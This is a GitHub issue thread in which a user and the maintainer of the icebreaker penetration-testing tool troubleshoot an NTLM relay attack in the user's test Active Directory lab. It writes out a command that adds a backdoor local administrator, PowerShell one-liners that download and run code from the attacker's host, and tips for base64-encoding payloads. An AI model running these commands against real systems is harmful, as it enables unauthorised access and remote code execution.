-
Notifications
You must be signed in to change notification settings - Fork 170
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
login after successful attack #4
Comments
Can you send me the ntlmrelayx.py output both before and after icebreaker said it added the new user? |
ntlmrelayx.py.log |
This is very odd. It looks like it should've successfully completed. Have you logged into the machine at .1 and confirmed icebreaker is not a a user with |
I can login and see a local user "icebreaker" but I can't remotely execute
code as him via smb, he has no admin permissions, no rdp etc.
Am 06.03.2018 18:53 schrieb "Dan McInerney" <notifications@github.com>:
… This is very odd. It looks like it should've successfully completed. Have
you logged into the machine at .1 and confirmed icebreaker is not a a user
with net user? I can't find anything in the code that might be the cause
here.
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
<#4 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AJ5jE2YdU2EJc2XFihzUh3cvhMvup76Cks5tbs0DgaJpZM4SaGjG>
.
|
Ah, interesting. OK so ntlmrelayx runs a command like this: net user icebreaker /add; net localgroup administrators /add icebreaker; <mimikatz/empire launcher code>. So my question is, did the script parse any mimikatz output or did you get an empire launcher if you ran it with --auto? Because I'm thinking the user that we hijacked the SMB connection from may not have had permissions to add a user to local admin (not sure how this would happen), or maybe the local administrators group was renamed? Or possibly an antivirus prevented the addition of the user to the local admins. Last possibility I can think of that might be the most likely is there's a GPO policy in place that overwrites the Administrators group to whatever is specified in the GPO. |
AV is deactivated for this first test. --auto just gives me an error.. submodule "empire" isn't setup correctly: Traceback (most recent call last): So DeathStar can't connect to it. |
You must've cloned icebreaker in the short period of time yesterday that I
was messing with Empire versions as that error you got was the same error I
was getting off the Empire dev branch. It should be working now. But the
fact you didn't see any mimikatz output points towards something happening
mid-command execution. One thing to try is to copy the base64 value out of
the ntlmrelayx command, then run it on the machine locally using:
powershell -nop -exec bypass -enc <base64 from end of ntlmrelayx command>.
I suggest doing this without the --auto flag so you get just the mimikatz
payload. This should give us the benefit of error messages if it fails
which will help a lot in figuring this out.
…On Wed, Mar 7, 2018 at 3:44 AM, theoneandonly-vector < ***@***.***> wrote:
AV is deactivated for this first test.
I don't see any mimikatz output.
--auto just gives me an error.. submodule "empire" isn't setup correctly:
Traceback (most recent call last):
File "empire", line 1360, in
main = empire.MainMenu(args=args)
File "/opt/icebreaker/submodules/Empire/lib/common/empire.py", line 84,
in *init*
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList,
self.obfuscate, self.obfuscateCommand) = helpers.get_config('rootuser,
install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
File "/opt/icebreaker/submodules/Empire/lib/common/helpers.py", line 554,
in get_config
cur.execute("ALTER TABLE config ADD COLUMN %s BLOB" % (field))
sqlite3.OperationalError: no such table: config
So DeathStar can't connect to it.
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#4 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ABuspcUh3MeBujAOTdROkwymwN9RaT7Fks5tb7oHgaJpZM4SaGjG>
.
|
new error occured after re-installing.. [] Attack 4: NTLM relay with Responder and ntlmrelayx During handling of the above exception, another exception occurred: Traceback (most recent call last): During handling of the above exception, another exception occurred: Traceback (most recent call last): During handling of the above exception, another exception occurred: Traceback (most recent call last): Command has been completed, press ENTER to exit the terminal. |
and what does this mean exactly?: |
could you tell me, how I can get a powershell empire session throgh custom command execution? and web-delivery also won't work: |
rpc_s_access_denied is an ntlmrelayx error but nothing to worry about; cmd
exec will occur without it.
when you're doing the single command you're using double quotes twice. The
command prompt is interpreting that as " powershell.exe -nop -w hidden -c "
being one string, then " IEX ((new-object net.webclient).downloadstring('
http://10.20.23.188:80/')) " as a second string. You'll need to escape the
right quotes with \". I'll look into the right way to do it as soon as I
can probably in the next couple weeks, just a lil busy at the moment.
…On Fri, Mar 9, 2018 at 8:24 AM, theoneandonly-vector < ***@***.***> wrote:
could you tell me, how I can get a powershell empire session throgh custom
command execution?
as the powershell-oneliner it can generate has some problems:
[*] Executed specified command on host: 10.20.23.1
[-] 'ascii' codec can't encode character u'\ufffd' in position 309:
ordinal not in range(128)
and web-delivery also won't work:
./icebreaker.py -l /home/admin/Desktop/targets.txt -s dns -c
"powershell.exe -nop -w hidden -c "IEX ((new-object
net.webclient).downloadstring('http://10.20.23.188:80/'))""
bash: syntax error near unexpected token `('
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#4 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ABuspQs_d3yQYBn_sQePwrb7Eb5_GaWAks5tcp6qgaJpZM4SaGjG>
.
|
I mispoke earlier. The rpc_s_access_denied error occurs when you are relaying a user with non-admin rights on the target machine. Command exec will not occur in this situation. The error I was thinking of I keep seeing that doesn't affect command execution is "SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)" The error you're getting where it says connection refused could be a handful of things. I think the most likely is that the adapter it's using (enp0s3) is not the correct one. You'll want to use your main internet connection adapter. You can see a list of your adapters with As for your error trying to get an empire shell with -c, I didn't have any trouble in my tests just now. The \ufffd unicode character is the replacement character for when unicode doesn't have a code for the character. This shouldn't occur in the Empire powershell launcher commands as they're base64 encoded which only uses characters that unicode can interpret. Are you pasting the Empire powershell launcher into a different program, then copying it out of that program? It seems like an artifact from another program or you're copying too many characters when you copy the Empire launcher out of the terminal. Last, your best bet for getting metasploit's web delivery to work is to base64 encode it first using https://raikia.com/tool-powershell-encoder/. So take The reason you're having trouble with the MSF webshell delivery is because you have to account for the fact that any command you want to run using icebreaker is going through 3 different interpreters: first bash because we run it in a terminal, then python interprets it, then the windows shell interprets its. Each of these has different special characters. You can mostly ignore the python interpreter because it's going to take the whole command as a string, but bash and windows are gonna mess with it. Best to avoid special chars like (, ), !, ~, etc entirely by base64 encoding the command. |
I finally got your errors about the connection while testing. It happens when Empire is not done booting up the REST API and we try to call DeathStar. I will fix this today to give it better error handling. |
So there doesn't seem to be an easy way of gracefully handling the connection errors DeathStar sends out if it tries to connect to Empire before the REST API is good to go. So I just increased the timeout between Empire starting up and DeathStar starting up which should fix it on everything but the absolute slowest of computers. |
it somehow crashes directly when the attack starts (no timeout): During handling of the above exception, another exception occurred: Traceback (most recent call last): During handling of the above exception, another exception occurred: Traceback (most recent call last): During handling of the above exception, another exception occurred: Traceback (most recent call last): |
Hmm yeah you're right. I'm not sure about this one. My main suspicion is that enp0s3 is the wrong interface. My VM will only bring up eth0 and lo interfaces and Responder works with lo so I'm not sure how to test with an incorrect interface. I tried running icebreaker with multiple responder programs running, but that didn't cause that error either. At this point I'd say try a different interface and let me know how that goes. |
I have only these: lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 |
Dang so that's not it. I'm a bit at a loss.
…On Mar 15, 2018 12:23 PM, "theoneandonly-vector" ***@***.***> wrote:
I have only these:
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.20.23.188 netmask 255.255.255.0 broadcast 10.20.23.255
inet6 fe80::8c80:2bed:1dc5:8582 prefixlen 64 scopeid 0x20
ether 08:00:27:75:c8:a5 txqueuelen 1000 (Ethernet)
RX packets 6499 bytes 9136163 (8.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2522 bytes 173337 (169.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 17 bytes 1497 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17 bytes 1497 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#4 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ABuspcn5Fsx6RP2U1N0qjcDdyv8FTnHfks5terGdgaJpZM4SaGjG>
.
|
hey there
It tells me,it automatically created an account "icebreaker:P@ssword123456"
but I somehow can't login via psexec:
] 10.20.23.1:445 - Authenticating to 10.20.23.1:445 as user 'icebreaker'...
[] 10.20.23.1:445 - Uploading payload...
[-] 10.20.23.1:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
it's the AD in my test environment.
The text was updated successfully, but these errors were encountered: